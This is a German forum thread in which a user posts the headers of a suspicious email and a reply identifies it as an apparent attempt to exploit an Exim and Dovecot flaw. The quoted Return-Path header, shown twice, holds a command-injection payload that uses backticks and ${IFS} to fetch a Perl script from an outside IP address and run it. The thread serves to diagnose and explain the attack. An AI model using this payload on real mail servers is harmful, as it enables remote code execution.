Verdächtige EMail

04/11/2013 - 19:27 von Hans Schlonies | Report spam
Hallo zusammen,

ich habe gerade eine àußert verdàchtige EMail erhalten, bei der ich
den Verdacht habe, dass da igrendwas im Argen liegt.

Return-Path: <x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>
X-Original-To: postmaster@localhost
Delivered-To: xxxxxxxx@yyyyyyyy.de <-- Meine EMail-Adresse
Received: by s12345678.onlinehome-server.info (Postfix)
id 1C6206363F; Mon, 4 Nov 2013 18:49:52 +0100 (CET)
Delivered-To: root@localhost.localdomain
Received: by s12345678.onlinehome-server.info (Postfix)
id 0CC7372128; Mon, 4 Nov 2013 18:49:52 +0100 (CET)
Delivered-To: postmaster@localhost.onlinehome-server.info
X-No-Auth: unauthenticated sender
X-No-Relay: not in my network
Received: from domain.local (unknown [1.234.45.84])
by s12345678.onlinehome-server.info (Postfix) with ESMTP id 504B16363F
for <postmaster@localhost>; Mon, 4 Nov 2013 18:49:51 +0100 (CET)

x

Ist das nur ein harmloser Testschuss, oder ist es dem gelungen,
sich irgendwelche Daten nach Indien übermitteln zu lassen.

Gruß
 

Lesen sie die antworten

#1 Kai Bojens
04/11/2013 - 19:31 | Warnen spam
(Umlaut in Betreffzeile repariert)

Hans Schlonies wrote:


Return-Path:
<x`wget${IFS}-


O${IFS}/tmp/p.pl${IFS}117.239.156.162/user.pl``perl${IFS}/tmp/p.pl`@blaat.com>

Ist das nur ein harmloser Testschuss, oder ist es dem gelungen,
sich irgendwelche Daten nach Indien übermitteln zu lassen.



Das war vermutlich ein Versuch, eine Lücke in Exim in Verbindung mit Dovecot
auszunutzen:

-> http://th-h.de/blog/archives/1701-V...Tages.html

Wenn es zu Dir durchgekommen ist, hat der Versuch offenbar keine Wirkung
gehabt.

Ähnliche fragen